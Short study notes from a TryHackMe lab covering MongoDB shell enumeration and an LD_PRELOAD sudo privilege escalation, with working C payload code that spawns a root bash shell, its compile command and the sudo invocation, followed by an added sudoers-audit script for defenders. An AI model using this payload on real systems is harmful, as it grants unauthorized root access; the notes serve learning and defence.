LD_PRELOAD and Mongo Notes

Before all

I learned these from Road on TryHackMe today

Notes

Mongo DB

It usually runs on port 27017

payloads(?):

Look for working services

ss -tulnp

MongoDB

// show databases
show dbs
// switch to a database (here the db name is backup)
use backup
// list collections (tables)
show collections
// read the contents of a collection (here the collection name is user)
db.user.find()

LD_PRELOAD

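LD_PRELOAD is an environment variable that tells the dynamic linker to load the listed shared libraries into any dynamically linked program before its other libraries.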

payloads:

shell.c

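#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid(), setuid() */

/* _init() runs as soon as the dynamic linker loads the library */
void _init() {
    unsetenv("LD_PRELOAD");   /* so child processes do not load it again */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}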

Library compilation:

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

Add LD_PRELOAD with sudo:

sudo LD_PRELOAD=/home/webdeveloper/shell.so sky_backup_utility

In case the sudo result looks like this:

env_keep+=LD_PRELOAD
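
The env_keep+=LD_PRELOAD condition above can also be checked from the defender's side. This is an added example, not part of the original notes: it scans sudoers-format text for Defaults lines that keep LD_* variables. The function name audit_sudoers, the sample policy and the command path in it are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag sudoers "Defaults" lines whose env_keep list preserves
# dynamic-linker variables (LD_PRELOAD, LD_LIBRARY_PATH, LD_* ...).

# audit_sudoers: reads sudoers-format text on stdin, prints one finding per
# risky entry as "<line-no>: env_keep preserves <VAR>", returns 1 if any found.
# Limitation: backslash line continuations are not joined.
audit_sudoers() {
    awk '
    /^[ \t]*#/ { next }                           # skip comment lines
    # "=" and "+=" add to the list; "-=" removes, so it is not matched here
    /^[ \t]*Defaults/ && match($0, /env_keep[ \t]*[+]?=[ \t]*/) {
        val = substr($0, RSTART + RLENGTH)
        if (substr(val, 1, 1) == "\"") {          # quoted list: up to closing quote
            val = substr(val, 2)
            sub(/".*/, "", val)
        } else {                                  # bare word: up to comma or space
            sub(/[, \t].*/, "", val)
        }
        n = split(val, vars, /[ \t]+/)
        for (i = 1; i <= n; i++)
            if (vars[i] ~ /^LD_/) {
                printf "%d: env_keep preserves %s\n", NR, vars[i]
                found = 1
            }
    }
    END { exit (found ? 1 : 0) }
    '
}

# Constructed sample policy (not taken from any real host).
SAMPLE='# constructed sudoers sample
Defaults env_reset
Defaults env_keep += "LANG LD_PRELOAD"
Defaults:webdeveloper env_keep+=LD_PRELOAD
Defaults env_keep -= LD_LIBRARY_PATH
webdeveloper ALL=(ALL) NOPASSWD: /usr/local/bin/example_tool
'

printf '%s' "$SAMPLE" | audit_sudoers || echo "env_keep findings listed above"
```

On a real host, feed it /etc/sudoers and each file under /etc/sudoers.d; removing the variable from env_keep closes the path described in these notes.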